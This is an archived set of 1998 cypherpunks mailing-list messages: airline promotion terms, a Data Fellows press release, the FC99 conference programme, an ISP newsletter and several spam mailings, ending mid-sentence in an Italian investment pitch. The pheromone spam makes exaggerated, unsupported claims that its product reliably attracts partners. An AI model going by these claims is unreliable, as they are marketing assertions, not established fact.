 Airfare:
 GENERAL : Fares shown are roundtrip, 
 nonrefundable and nonchangeable. Tickets may only be
 purchased via the TWA website. Fares do not include 
 Passenger Facility Charges of up to $12 depending on
 itinerary. Electronic ticketing and credit card form 
 of payment only. Offer is not available in conjunction
 with any other promotion, coupon, or discount. Seats 
 are limited and may not be availabe on all flights or
 dates.  Standby is not allowed. Tickets must be purchased
 at the time of booking. Travel is on TWA only, no other
 air carrier.  Certain domestic airfares of $89 or higher
 may be discounted by redeeming 5000 Aviatior miles. Aviator 
 miles are not earned when redeeming miles for fare discount.
 Aviators earned and purchased upgrades may not be used in 
 conjunction with the 5000 mile redemption.  Once miles are
 redeemed they may not be recredited to the members 
 account and are nonrefundable. 
 
 DOMESTIC: All fares allow travel to originate in either
 direction (except NYC/LAS which may originate in NY only). 
 All fares allow departure Friday 12/18 after
 7 p.m. and certain fares indicated also allow departure 
 all day Saturday 12/19.  All return travel is allowed 
 either Monday or Tuesday 12/21 or 12/22. All travel must
 be completed by 12/22.  Travel between New York and 
 Las Vegas via nonstop flights only. Tickets must be purchased
 by 12/18/98.
 
 INTERNATIONAL: Travel for St. Maarten must originate 
 in New York only and may depart December 17 or 18. 
 Return travel is allowed December 19-21, 24, 25. 
 Fare does not include $47 in APHIS/U.S. Customs/Immigration/
 U.S. Departure/Security Surcharge fees. Aviator 
 upgrades are not permitted. Tickets must be purchased
 by 12/18/98.
 
 Car Rental Conditions: 
 Taxes (including in California, VLF taxes ranging up to $1.89 per day), 
 registrations fee/tax reimbursement, and airport access fees/taxes, 
 if any, are extra. Optional CDW, liability insurance, fuel, additional
 driver fee, drop charges and other optional items are extra. Rates 
 higher for renters under age 25. Rates valid for economy rentals(unless stated otherwise by Alamo) 
 commencing on Friday and ending by 11:59 PM on Monday. Rates only valid 
 during week in which they are published via TWA Internet site. 
 A 24-hour advance reservation is required. Availability is limited. Two
 day minimum rental required. 
 
 Hotel Conditions: 
 Hilton Hotels and Resorts special rates are available only during 
 the specific week in which they are published via the TWA Hot 
 Deals Internet site and the HiltonNet Internet site. Limited 
 availability; rooms at these Hilton Value Rates are sold on a 
 first-come, first-served basis. Availability, rate, and terms of 
 occupancy are not guaranteed and will be confirmed at time of
 reservation. Participating hotels, rates and terms are subject 
 to change without notice. Single or double occupancy. Early check-in, 
 late check-out subject to availability. No extra charge for
 children when they stay in parents' or grandparents' room; 
 total room occupancy subject to local fire safety regulations
 and other applicable laws or regulations. Rates vary by season, 
 do not include any other fees or charges, including without 
 limitation state or local taxes or gratuities and are subject
 to change without notice. Advance booking required. Advance deposit
 may be required. Offer cannot be combined with any other special 
 discounts, coupons, certificates, special rates, promotional offers, 
 award stays, or meeting/group stays. Hilton reserves the right to 
 cancel any Hilton Value Rate at any time without notice. Hilton 
 is not responsible for the terms of other offers in the program, 
 or for any electronic, computer, telephone, security, virus 
 or any other problem or damage related to use of the 
 program or its offers.  
 
 
 
 
 
 
 






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Marita Nasman-Repo <Marita.Nasman-Repo@DataFellows.com>
Date: Tue, 15 Dec 1998 07:11:26 -0800 (PST)
To: press-english-general@lists.datafellows.com
Subject: MEDIA RELEASE: Data Fellows Joins the Microsoft Security Partners Program
Message-ID: <3.0.32.19981215170136.0098ad60@smtp.datafellows.com>
MIME-Version: 1.0
Content-Type: text/plain
Content-Length: 4681
Lines: 109


This message comes from Data Fellows. You have previously expressed
interest in our products or asked to be included on one of our press
release lists. To remove yourself from our mailing lists, reply to this
message with the text "remove " in the subject field.

PRESS RELEASE

FOR IMMEDIATE RELEASE


Data Fellows Joins the Microsoft Security Partners Program

Helsinki, Finland, December 15, 1998-- Data Fellows, the global leader in
developing data security software solutions, has been invited to join the
Microsoft Security Partners Program.

The Microsoft Security Partners Program
(http://www.microsoft.com/security/partners) provides customers with the
tools and information they need to establish, test and maintain effective
information security for their computing infrastructure. The program brings
together software manufacturers, security consultants and security
trainers, making it even easier for customers to provide robust security in
their Microsoft Windows NT operating system-based networks.

Three Data Fellows products are included in the Microsoft Security Partners
Program. F-Secure Workstation Suite consists of malicious code detection
and removal as well as unobtrusive file and network encryption, all
integrated into a policy-based management architecture. F-Secure VPN+
provides a software-based, IPSec/IKE VPN solution scaleable for large
corporate networks as well as remote and small office networks. F-Secure
FileCrypto is the first and only product to integrate strong real-time
encryption directly into the Windows NT-based file system.

"Microsoft is pleased to include Data Fellows as part of its Security
Partners Program," said Karan Khanna, Windows NT Security Product Manager
at Microsoft Corp. "This program will help our mutual customers develop and
deploy secure solutions built on the Windows NT platform."

"The relationship with Microsoft shows Data Fellows' commitment to improve
the native security of standalone and networked computers with a
comprehensive, centrally managed suite of security services," said Risto
Siilasmaa, president and CEO of Data Fellows. "Data Fellows is committed to
providing globally available seamless security for Windows users; security
that is strong yet easy to manage and economical."

Data Fellows is one of the world's leading developers of data security
products. The company develops, markets and supports anti-virus, data
security and cryptography software products for corporate computer
networks. The company has head offices in San Jose, California, and Espoo,
Finland, and branch offices in Washington, DC, Calgary, London, Paris and
Munich, as well as corporate partners, VARs and distributors in over 80
countries. 

All F-Secure products are integrated into the F-Secure Framework management
architecture, which provides a three-tier, scaleable, policy-based
management infrastructure which minimizes the costs of security management. 

In addition to the products in the Microsoft Security Partners Program, the
F-Secure product line also includes the following products. F-Secure
Anti-Virus is the most comprehensive, real-time virus scanning and
protection system for all Windows platforms. It utilizes multiple scanning
engines, including F-PROT and AVP. F-Secure SSH provides secure remote
login, terminal, and other connections over unsecured networks. It is the
most widely used secure remote administration tool. F-Secure NameSurfer is
the solution for remote Internet and intranet DNS administration. Its
easy-to-use WWW user interface automates and simplifies DNS administration.

Data Fellows has customers in more than 100 countries. Its customers
include many of the world's largest industrial corporations and best-known
telecommunications companies, major international airlines, governments,
post offices and defence forces, and several of the world's largest banks. 

Data Fellows was named one of the Top 100 Technology companies in the world
by Red Herring magazine in its September 1998 issue. Other commendations
include the Virus Bulletin 100 % award (several times in 1998); Hot Product
of the Year 1997 (Data Communications Magazine); and the 1996 European
Information Technology Grand Prize.

For more information, please contact 

USA:
Data Fellows, Inc.
Mr. Pirkka Palomaki
675 N. First Street, 8th floor
San Jose, CA 95112
USA
Tel. +1 408 938 6700, fax +1 408 938 6701
E-mail: Pirkka.Palomaki@DataFellows.com

Europe:
Data Fellows Ltd.
Mr. Ari Hypponen
PL 24
FIN-02331 Espoo
Finland
Tel. +358 9 859 900, fax. +358 9 8599 0599
E-mail: Ari.Hypponen@DataFellows.com




--
Marita.Nasman-Repo@DataFellows.com, 
World-Wide Web http://www.DataFellows.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ray Hirschfeld <R.Hirschfeld@cwi.nl>
Date: Tue, 15 Dec 1998 17:47:29 -0800 (PST)
To: R.Hirschfeld@cwi.nl
Subject: FC99 Preliminary Conference Program
Message-ID: <UTC199812160140.CAA00514.ray@vanity.cwi.nl>
MIME-Version: 1.0
Content-Type: text/plain
Content-Length: 8499
Lines: 286


                      Financial Cryptography '99
                 February 22-25, 1999, Anguilla, BWI
                    Preliminary Conference Program

FC99, the third international conference on financial data security
and digital commerce, will be held in Anguilla, British West Indies.
FC99 aims to bring together persons involved in both the financial and
data security fields to foster cooperation and exchange of ideas.  The
conference is organized by the International Financial Cryptography
Association (IFCA).


PRELIMINARY CONFERENCE PROGRAM

Monday 22 February

Session 1: Electronic Commerce

Experimenting with electronic commerce on the PalmPilot
Neil Daswani, Dan Boneh (Stanford, U.S.A.)

Blinding of credit card numbers in the SET protocol
Hugo Krawczyk (Technion, Israel)

Session 2: Anonymity Control

Trustee tokens: Simple and practical anonymous digital coin tracing
Ari Juels (RSA Laboratories, U.S.A.)

A new approach for anonymity control in electronic cash systems
Tomas Sander, Amnon Ta-Shma (ICSI, U.S.A.)

Session 3: Fraud Management

E-cash systems with randomized audit
Yacov Yacobi (Microsoft Research, U.S.A.)

Assessment of counterfeit transaction detection systems for smart card
based ecash
Kazuo Ezawa, Gregory Napiorkowski, Mariusz Kossarski (Mondex International,
U.S.A.)


Tuesday 23 February

Session 4: Invited Speaker

Adi Shamir (Weizmann Institute, Israel)

Session 5: Public-Key Certificates

Reasoning about public-key certification: On bindings between entities and
public keys
Reto Kohlas, Ueli Maurer (ETH, Switzerland)

Online certificate status checking in financial transactions: The case for
re-issuance
Barbara Fox, Brian LaMacchia (Microsoft, U.S.A.)

Online certificate checking: One year later
Panel discussion led by Michael Myers (VeriSign, U.S.A.)


Wednesday 24 February

Session 6: Steganography

Playing `hide and seek' with stored keys
Adi Shamir (Weizmann Institute, Israel), Nicko van Someren (nCipher, England)

On channel capacity and modulation in watermarking of digital still images
Markus Breitbach, Hideki Imai (University of Tokyo, Japan)

Session 7: Content Distribution

Towards making broadcast encryption practical
Michel Abdalla (U.C. San Diego), Yuval Shavitt and Avishai Wool (Bell
Labs, U.S.A.)

Conditional access concepts and principles
David Kravitz and David Goldschlag (Divx, U.S.A.)

Fair use, intellectual property, and the information economy
Panel discussion led by Joan Feigenbaum (AT&T Labs, U.S.A.)


Thursday 25 February

Session 8: Anonymity Mechanisms

Anonymous authentication of membership in dynamic groups
Stuart Schecter (Harvard), Todd Parnell, Alexander Hartemink (MIT, U.S.A.)

Some open issues and new directions in group signatures
Giuseppe Ateniese (Universita di Genova, Italy), Gene Tsudik (USC ISI,
U.S.A.)

Session 9: Auctions and Markets

Anonymous investing: Hiding the identities of stockholders
Philip MacKenzie (Bell Labs, U.S.A.), Jeffrey Sorensen (IBM Research, U.S.A.)

Fair on-line auctions without special trusted parties
Stuart Stubblebine (AT&T Labs, U.S.A.), Paul Syverson (Naval Research Lab,
U.S.A.)

Session 10: Distributed Cryptography

"Dynamic Fault"-robust cryptosystems meet organizational needs for dynamic
control
Yair Frankel and Moti Yung (CertCo, U.S.A.)

Improved magic ink signatures using hints
Markus Jakobsson (Bell Labs, U.S.A.), Joy Muller (Gutenberg University,
Germany)


RUMP SESSION

In addition to the regular conference program, a rump session will be
held on the evening of Tuesday 23 February to provide an opportunity
for less formal presentations.  Although the rump session will be
organized during the conference itself, advance proposals may be
submitted by email.  Rump session contributions will not appear in the
conference proceedings.

Send rump session contributions to:
Matt Blaze
email: mab@research.att.com


EXHIBITION

An exhibition will be held in conjunction with the technical program,
with product displays, demonstrations, and presentations of a
business-oriented nature.  Scientific sessions are primarily scheduled
for the mornings and exhibition sessions for the afternoons.


CONFERENCE VENUE

The conference will be held at Chandeliers, the conference facility of
the InterIsland Hotel, which is on Road Bay, near Sandy Ground
Village, in the South Hill section of Anguilla.  The conference will
have TCP/IP internet access.  Shuttle service between the conference
and the Mariners hotel will be available.


REGISTRATION

Registration can be done via the web at URL http://fc99.ai/.  The fee
for the conference, which covers all conference materials and events
(including preproceedings, final proceedings, attendance at scientific
sessions, and breakfast and lunch each day of the conference), is:

$850 regular registration
$350 academic registration
$150 student registration

An additional $50 fee applies to registrations for which payment is
received after January 1, 1999.

A $100 discount ($50 for academic and student registrations) is
available to participants who pay their registration fee by electronic
money.

Payment may be made by credit card, bank transfer, electronic money,
or cash.


STIPENDS

A limited number of stipends to help defray the costs of attendance
may be available to full-time students with a paper accepted for
presentation at the conference.  If you would like to apply for a
stipend, please contact the General Chair at the email address listed
below.


HOTEL ACCOMODATION

The conference hotel is not recommended except to those seeking budget
accomodations.  The recommended hotel is Mariners, where a block
reservation has been made.  To reserve a room, please call the hotel
at +1 (809) 497-2671 and mention that you will be attending FC99.
Information about other hotels is available at URL http://fc99.ai.


WELCOME RECEPTION

A welcome reception will be held from 6:30pm to 8:00pm on Monday,
February 22, 1999, the evening of the first day of the conference.


GENERAL INFORMATION

Visas

Visas are not required for citizens of most American and European
countries.  If you are uncertain about whether you need a visa,
contact the local British consulate for information.

Getting to Anguilla

>From North America, Anguilla is usually reached via San Juan (Puerto
Rico).  From Europe, the best connections are via
St. Maarten/St. Martin (from Amsterdam or Paris), or Antigua (from
London).  St. Martin is very close to Anguilla and is connected by
ferry as well as by plane.

Local Transportation

The simplest way to get around Anguilla is to rent a car.  You will
need to buy an Anguilla drivers license, but this is a formality.
Taxis are also available.  Another possibility is to hitch rides from
local residents, who are eager to provide them and will often stop to
offer rides unsolicited.  Transportation will be provided at specific
times between Mariners and the InterIsland hotel.

Weather

Expect temperatures in the 20's or 30's Celsius, 70's or 80's
Fahrenheit.  There is often a strong wind, with cloudbursts that
quickly blow over.  Dress code for the conference is shorts and
T-shirt.

Money

The local currency is the Eastern Caribbean dollar (EC$), with an
exchange rate of approximately EC$2.7/US$1, but many goods and
services in Anguilla, particularly those aimed primarily at tourists
(such as restaurants and hotels) are priced in US dollars.  US dollars
are freely tradable everywhere on the island, so there is no need to
obtain EC dollars before arrival.


PROGRAM COMMITTEE

Joan Feigenbaum, AT&T Labs
Yair Frankel, CertCo
Matthew Franklin, Xerox PARC
David Goldschlag, Divx
Markus Jakobsson, Bell Labs
Ari Juels, RSA Labs
Arjen Lenstra, Citibank
Clifford Neuman, Univ. Southern California
Berry Schoenmakers, Digicash
Jacques Stern, ENS
Yacov Yacobi, Microsoft
Bennet Yee, U.C. San Diego

Program Chair:
Matthew Franklin        
email: franklin@parc.xerox.com


ORGANIZING COMMITTEE

General Chair:
Rafael Hirschfeld
email: ray@unipay.nl

Local Arrangements Chair:
Vincent Cate
email: vince@offshore.ai


SPONSORS

FC99 is sponsored by:

nCipher Corporation <http://www.ncipher.com>
e-gold Transnational <http://www.e-gold.com>
Hansa Bank & Trust Company <http://www.hansa.net/>
Offshore Information Services <http://offshore.ai/>

If you are interested in sponsoring FC99, please contact the General
Chair at the email address listed above.

For further information, please see the main FC99 conference web page
at URL http://fc99.ai/.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "sales@equipmentresource.com" <sales@mymerchantaccount.com>
Date: Wed, 16 Dec 1998 11:26:15 -0800 (PST)
To: Friend@public.com
Subject: Equipment Resource: December Equipment Update
Message-ID: <199812161918.DAA03679@maesgi.mae.cuhk.edu.hk>
MIME-Version: 1.0
Content-Type: text/plain
Content-Length: 2371
Lines: 72


EQUIPMENT RESOURCE 
Ph:303-451-8022 Fax:303-451-8747
11184 Huron Ste.12 Northglenn, CO 80234 

Equipment Resource wishes you a Happy Holiday!
What better way to get ready for a prosperous New Year than to 
Accelerate Assembly. Increase production floor space by selling 
your surplus, or add a link on our web site to increase sales.
(click on the http links to view equipment. You must be online.)

Equipment Resource presents it's top 10 list to increase 
production and save money!

1.Westek Formula III Plus. Inline Aqueous Cleaner. Great cleaner, 
Great Condition.

2.Eubanks 2700 -IV. Wire cut/strip system. With TAB wire marker. 
Beautiful Shape.

3.Watkins Johnson 18-SMD. Reflow oven. Edge Rail, N2O. Convection. 
Nice Shape, Nice Price.

4.Quad 100 Pick and Place Systems. Several available. 
Great start up system.
http://www.equipmentresource.com/quad_100_pick.htm

5.Unit Design MDS 100. Drag Solder System. Rebuilt from the 
frame up. Warranty available.
http://www.equipmentresource.com/images/UDMDS.jpg

6.Hepco 8000-1. Axial Cut and Form. Tape feed. 
Hassle free component prep!
http://www.equipmentresource.com/images/Hepco8000-1.JPG 

7.Blue M Oven. 1 Cubic foot interior. 38c to 260c. 
Stabil-Therm Controller. Make an offer.

8.ECD 6300 Batch Washer. PCB Cleaning made easy. 
No Frills, Nice Price.
http://www.equipmentresource.com/images/ECD6300-101398.JPG

9.Cut & Bend. Hand Crank Axial Prep System. 
Simple efficient way to increase production.
http://www.equipmentresource.com/images/cutbend.jpg

10.AMI Presco 1826. Screen Printer. Most under-rated system 
on the market.= Quality/Low cost
Leasing available on all equipment

For a complete listing of Equipment, to Sell your Surplus at 
no Cost, or to take advantage of a Free link to your web page 
go to .http://www.equipmentresource.com

If you know someone who could benefit from our services please 
forward this to them.

If you do not wish to receive equipment updates please reply 
with remove in the subject line to.

All recipients who do not reply to remove will receive further 
updates. 
Thank you all; buyers and sellers, friends old and new, and 
inquirers too for your business and support all thru the year 
of 1998. We send our sincere wish for a prosperous business year 
with good health and much happiness to each of you.

Sincerely, All of us at Equipment Resource.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: bullwinkle@3253137429
Date: Wed, 16 Dec 1998 14:45:04 -0800 (PST)
To: bullwinkle@3253137429
Subject: Yo, Sorry about the delay!
Message-ID: <199812170000.BAA12492@www.pml.it>
MIME-Version: 1.0
Content-Type: text/plain
Content-Length: 9349
Lines: 146


BOOST YOUR SEX APPEAL AND CHANGE YOUR SOCIAL AND SEX LIFE FOREVER. 

SCIENCE AND NATURE'S SEXUAL SECRET WEAPON! 

Scientists have isolated the natural Human male/female Pheromone attractants 
and they are NOW available to YOU, legally, in the US. 

ATTRACT THE OPPOSITE SEX LIKE NEVER BEFORE ! 
IT'S GUARANTEED, or you pay nothing! 


PHEROMONES in the News! 

>From the NY Times to the LA Times. USA Today, The Wall Street Journal, Psychology Today, 20/20, Hard Copy, Single Living, Medical Tribune, Philadelphia Inquirer, Dateline, Discovery, Hustler, Playboy, Rocky Mountain News, McCalls, Penthouse, Cosmopolitan, BBC-TV, Colordao Telegraph, GQ, Time, Redbook, Fortune Magazine, and more.  Radio and Television Stations worldwide.  All have reported the scientific findings amidst excitement, controversy, commotion and thrill about pheromones and their potential use. 


The Press Has Said it Better Than We Can. 

"PUT IT TO THE TEST" MERIDIAN TV: 
Sold extensively in the UK, phermomones were tested live on television in the UK, when the unknowing female presenter was VERY ATTRACTED to one of the twin guys,  he was wearing "Androstenone Pheromone"  but she did not know this, and did not know why she was attracted to him ! 

US NEWS and WORLD REPORTS 
"The key to starting a love affair might be right under your nose. Scientists have just announced the discovery of a virtual sixth sense, a tiny organ in the nasal cavity that responds to chemicals known as pheromones. These natural substances are thought to play a role in basic human emotions such as fear, hunger--and love." 
FORTUNE MAGAZINE:  
"An imaginative University of Utah anatomist named David L. Berliner was working with substances that occur in human skin. When he left some of the extracts in open vials around the lab, he noticed a sudden, puzzling rise in camaraderie among a previously acrimonious group of researchers working with him. When he changed the extracts a 
few months later, the group resumed its contentious ways. Berliner froze and saved the extracts. 
Nearly 30 years later, ...  thanks to a method of containing drugs and cosmetics inside tiny, spongelike polymer spheres, he returned to the subject. In 1989 he ... has isolated the suspected good-fellowship pheromones -- behavior-controlling substances similar to those already known to stimulate sexual activity in animals. (One whiff of a pheromone called aphrodisin from a female hamster and a male is ready to mate.) 

On March 3, 1998 FOX Affiliate, WSVN in Miami did a story on Pheromones, stating, "If you're looking for love, we've got a potion for passion." ...  "Tonight, a secret weapon to attract the opposite sex.  Researchers developing their own passion potion. Ever been attracted to someone but weren't really sure why? .... More and more research is pointing to chemicals these days.... undetectable chemicals... pheromones ... a clear odorless liquid" 

Customers Say: 

"... works as advertised, best product of its' kind" 

I've always had trouble meeting women-then I tried your product.  Now girls come up to me and introduce themselves all the time! I'd like to know if your product is available in a larger quantity so I can make sure I'm never without it! 
-Dave J 

I've been driving a tractor trailer for about 6 years and I'm on the road all the time. It's been impossible to meet women until I tried pheromones.  Now every truck stop I pull into I meet new women, and many of them ask me out. Thanks! 
-Tom on the Road Again, 

WHAT ARE PHEROMONES? 

Pheromones are a naturally occurring chemical compound found in all insects, all animals, and in humans. When pheromones are secreted they dictate sexual behavior and attract the opposite sex.  Be careful. Animal pheromones do NOT attract humans. 

Have you ever wondered why people who are not particularly attractive seem to attract dates like flies to honey?  They seem to have some "chemical attraction" about themselves. Some call it animal magnetism. It may be pheromones.  Now you can have that "chemical attraction" whenever you want. 

PHEROMONES - THE FACTS 

       Pheromones are natural chemicals which play an important role in sexual communication. 

       Animals, including humans release chemicals in tears, saliva and perspiration. These chemicals send signals relating to mood and health to the subconscious awareness.  One theory is that the dominant male will exude more of these chemical attractants than a submissive or weaker male.  This chemical attracts more females to him.  It is similar for woman attracting men. This natural attractant can also contribute to more 
intense excitement during love making (sexual foreplay and sexual intercourse). Pheromones may also contribute to the dating phrase, "chemical attraction" that we all talk about.  WSVN-TV (March 3, 1998) "Ever been attracted to someone but weren't really sure why? .... More and more research is pointing to chemicals these days.... undetectable chemicals... pheromones ... a clear odorless liquid" 


MORE RESEARCH AND REFERENCES: 
Following is some research done on products made by our manufacturer, and bottled under a different name.  It contains the same pheromone type and content as Hi-Octane
http://www.angelfire.com/fl/beaches69/index.html 



ABOUT OUR PRODUCT: 

Hi-Octane (tm) 

.. is made up of PHEROMONES suspended in witch hazel.. This product is designed to be added to your favorite cologne or perfume. 

.. contains both male and female PHEROMONES. Nature never intended for 
just one PHEROMONE to be present; but two, male and female. Our manufacturering process uses both PHEROMONES in ALL our products. This will not attract same sex; 
but works as nature intended, attracting the opposite sex. 

.. comes in 1/8 oz. Bottle with a small funnel so you can easily pour it into 
your cologne or perfume. One 1/8 oz. bottle is enough to mix with 4 to 8 oz of 
your favorite perfume product.  

Similar pheromone products have been sold for up to $100 elsewhere. We sell the the strongest product on the market today for only $39.95. 

BUY two -- get one free. 

The world's largest manufacturer of Pheromones, MC Marble, now manufactures Hi-Octane (tm), a pheromone prodcut that is the "Most Powerful sexual attractant on the Market today." 

HI_OCTANE is made with two powerful synthesized human 
pheromones, Alpha-Androstenol and Alpha-Androstenone. 

HI-OCTANE  will attract the opposite sex of the wearer.  McCall's magazine writes 
"...pheromones can improve one's love life, pheromones send out subconscious 
scent signals to the opposite sex that naturally trigger romantic feelings." 

HI-OCTANE  according to the manufacturer, may also intensify sex, by increasing sexual pleasure and endurance of both partners, and creating a higher sexual ecstasy. Individual results may vary.   One private study claims that pheromones don't work for everyone. 75% of those trying it had success.  Isn't it worth trying? 

HOW TO ORDER Hi OctaneTM 

Hi OctaneTM is available from Euphoria Products. 

A 1/8 oz. bottle with a convenient funnel (to be added to your favorite perfume) is 
$39.95. Mix 1/4 of the bottle with every 2 oz of your favorite product. One 1/8 oz. bottle is enough to mix with 4 to 8 oz of your favorite product. 

                         *** 

  For a limited time, when you order two bottles (up to a two month's supply) of Hi Octane(tm), you'll get a third bottle ABSOLUTELY FREE. 

                         *** 

Please add $3.00 shipping and handling per order. (regardless of how many bottles you order, you pay only $3.00 total!) 

UPS Second Day Air Delivery is available for an additional $9.00 per order.  Overnight, add $15.00 per order. 

Florida residents, please add applicable sales tax. 

For orders from outside of the US only ground shipping is available for $15. 

Our manufacturing facility offers the STRONGEST pheromones on the market today. Our manufacturing facility assures you that Hi-Octane will be always contain the male and female pheromones, the way nature intended it, to best attract the opposite sex for you. It is and will always be manufactured with the finest ingredients to assure your satisfaction. 



                        SATISFACTION GUARANTEED 

Try Hi OctaneTM risk-free. Your satisfaction is unconditionally guaranteed. If you do not find you are meeting and dating and scoring with more people of the opposite sex after using High OctaneTM for 30 days, simply return the unused portion of your order at any time for a full refund--no questions asked. 



Call 520-453-0303 Extension 202,  24 hours/day, 7 days/week for credit card orders. Have your MasterCard, Visa, American Express, and Discover Card  ready and say, " I would like to order ___ bottles of High Octane." 

If you would like to order by mail, you can send in a check or money order, or credit card information,  along with your name and street address (no PO Boxes please) and a day time phone number to: 

                         Euphoria Products Dept. 202 
                    1859 No Pine Island Rd. Suite #133
                            Plantation, FL 33322 






The Mailing List that you are being mailed from was filtered against
a Global Filter List. If you would like not to recieve any other mailings of this type please call: 1-888-745-6328






F




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: news <news@quake.connectfree.net>
Date: Wed, 16 Dec 1998 16:23:26 -0800 (PST)
Subject: No Subject
Message-ID: <199812170028.AAA00601@radius.connectfree.net>
MIME-Version: 1.0
Content-Type: text/plain
Content-Length: 7655
Lines: 192


Connect Free    Newsletter  November/December 98

Connect FREE would like to wish all our customers a Happy Christmas and a
Prosperous New Year

Welcome to Connect Free, and thank you for joining our service, we hope you
find our third newsletter informative. September and Octobers Newsletter
can be viewed on our web site at the bottom of the FREE Internet page.

Connect FREE would like to apologise for Novembers Newsletter not being
sent out. We were waiting for the upgrade to the Connect FREE network to be
completed and the launch of the new services.

----------------------------------------------------------------------------

Upgrades

As mentioned in our last newsletter, Connect FREE has now doubled it's
network capacity,  no more engaged tones and a faster connections to the
Internet. We have added another 2MB of bandwidth to our network and twice
as many modems and lines.

Connect FREE can NOW offer V90 connections and is the first FREE ISP to
offer 128K ISDN connections.

For 128K ISDN, please dial 0845 662 1406
For V90, please dial 0845 662 1506

For customers that connect through Aardvark the number will be
For 128K ISDN, please dial 0845 662 1409
For V90, please dial 0845 662 1509

Connect Free is aiming to be not only the first Internet Service Provider
to offer FREE Internet access but also the Best 

----------------------------------------------------------------------------

POP 3 & SMTP Mail

Connect FREE is proud to announce the launch of it's E-mail Service.

Connect FREE customers can NOW receive UNLIMITED POP3 e-mail addresses,
individually password protected.

Example e-mail address: myname@connectfree.co.uk and
myname@anywhere.connectfree.co.uk

Sending emails can only be done via a Connect FREE dialup, however you will
be able to receive your mail from any other ISP's dialup account.

For your Connect FREE e-mail addresses, please go to
http://www.connectfree.net/update
Coming shortly, FREE Web space

----------------------------------------------------------------------------

Changing your Details on Line

Connect FREE has designed a web page so you can alter your details on-line,
for example change your email addresses and contact details.

To update your details and add additional e-mail addresses please go to
http://www.connectfree.net/update

----------------------------------------------------------------------------

Games Server

The Connect FREE Games Server has been upgraded and is better than ever
before, it also includes Quake II as well as Quake. Please check out the
bulletin board on the Games Web Page for dates on matches.

----------------------------------------------------------------------------

FREE Software/FTP Web Site

Connect FREE has become a mirror site for TUCOWS, which will be available
very shortly.

What is TUCOWS?
TUCOWS is the UK premier FTP web site for FREE PC Internet software, and
because Connect FREE users will be able to connect direct to the server at
Connect FREE, bypassing the Internet, meaning downloads will be a lot faster
then you have ever seen before. The site is also updated on a daily basis, so
the latest upgrades are always available. Software available to download
includes Internet Explorer, Netscape, Mail packages, FTP software, News hosts.

You name it, we got it, and it is all for FREE!

----------------------------------------------------------------------------

Premium Rate Telephone Technical Support

Connect Free has launched it's Premium Rate technical support line on 0890
900 0050, sorry but all calls are charged at 50p per minute. The reason for
charging 50p per minute is because the Internet connection is
free and we need to cover our overheads and staffing cost for the technical
support lines, however we are cheaper than most of our competitors. E-mail
technical support is still available, obviously this is only useful when
you can connect to the Internet. (Please ensure you include you Login ID
with any communication)

----------------------------------------------------------------------------

On-line Technical Support

If you can connect to the Internet it might be worth while checking out
www.connectfree.net/help
Connect FREE has designed a very comprehensive technical support web page,
which covers a vast amount of topics. Ranging from how to connect and
configure Mail, FTP, IRC, CHAT and Browser software to how to design a Web
Site and there is some useful tips on solving problems (Well worth a LOOK)

Support for MS Windows 3.11 95/98 NT, Apple Mac, and Linux

----------------------------------------------------------------------------

The New Connect FREE Portal

Connect FREE are proud to announce the launch of the Connect Free Portal
site in association with 2b.
A Fantastic site for up-to date News, Weather, Lottery Results, Shopping,
Entertainment, Sports and Music.
Need a map of any area within the UK, no problem, enter a postcode to
receive a map of the area you intend visiting. Searching for a service or
where to-go in any area, could not be easier with
the Connect FREE Portal.

Visit www.connectfree.2b.co.uk

----------------------------------------------------------------------------

FreeServe

For all those users out there, who have signed up with FreeServe and would
prefer to have the option of which ISP you dial into or maybe have several
connections to different ISP's. FreeServe have now decided to offer anyone
with a FreeServe connection the ability to uninstall your FreeServe software.

Check out http://www.freeserve.net/support/cserve_uninstall.htm

----------------------------------------------------------------------------

Proxy Server:

We are still receiving calls on our help line regarding Proxy server
settings. Connect FREE does not currently have a Proxy Server, and if your
software is configured to look for one then you will go nowhere. If you find
that you can connect to our servers without a problem but then find that
when you launch your browser you cannot access any web pages or performance
is very slow, then you probably have the Proxy Server setting enabled. To
Disable (Win95/98): Control Panel, Internet, and Connection, Un-tick the
Proxy Server settings.

----------------------------------------------------------------------------

SantaCalls

Wouldn't your child, grandchild, godchild, nephew or niece just love a
personal call from Santa this Christmas?

In association with the Variety Club we are asking our users to visit their
Santa Calls Web site. The idea is that mums and dads can enter the details
of their children i.e. names of pets and things they would like for
Christmas etc and then Santa actually phones the child and has a chat. The
kiddie is totally convinced because Santa is armed with all their details -
and who knows little Johnny might just clean that hamster out a bit more
often when he knows Santa is watching! Visit Santa Calls at
http://www.santacalls.org/

----------------------------------------------------------------------------

Improvements

Connect Free would like to hear from you, if youhave any suggestions on how
we may improve our service, or adding more content to the Connect Free web
site.

It is Connect Free policy not to send unwanted rubbish by e-mail or junk
advertising by any other means. All we ask is that you receive our monthly
newsletter informing you of any changes to the service and any new service
that may come available which you may benefit from.

----------------------------------------------------------------------------

Contact us at   info@connectfree.net

Telephone: 0870 742 1111 (Calls charged at the current national call rate)




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: lamarck@sis.it
Date: Thu, 17 Dec 1998 07:48:55 -0800 (PST)
Subject: J. Lamarck, Advisors in Biotechnology
Message-ID: <199812171548.HAA17955@toad.com>
MIME-Version: 1.0
Content-Type: text/plain
Content-Length: 1780
Lines: 42


Egr. Signore / Signora,

Come  ormai ampiamente noto,  cominciato il grande processo di
transizione dall'industria chimica, che per decenni ha trainato
l'economia di molti paesi, a quella delle biotecnologie avanzate. Il
fortissimo sviluppo di questo settore sta dando vita al pi dinamico
mercato azionario di fine secolo.

La J. Lamarck  la prima societ di consulenza finanziaria nata per
soddisfare le esigenze di tutti coloro (privati, banche, istituzioni o
grandi aziende) che vogliono investire in biotecnologia con cognizione e
sicurezza. Offre un servizio altamente qualificato e personalizzato in
cui la disciplina, la responsabilit ed il mantenimento della fiducia
del Cliente rappresentano i cardini della sua politica di management. Il
nostro programma consente di soddisfare la necessit di diversificazione
di coloro che hanno intravisto la grande potenzialit del settore delle
biotecnologie e desiderano perci investire in questo segmento di
mercato in continua crescita. La diversificata composizione del
portafoglio comporta la riduzione del rischio che  normalmente
associato agli investimenti in singole imprese del settore.

Siamo continuamente orientati alla comunicazione con tutti coloro che
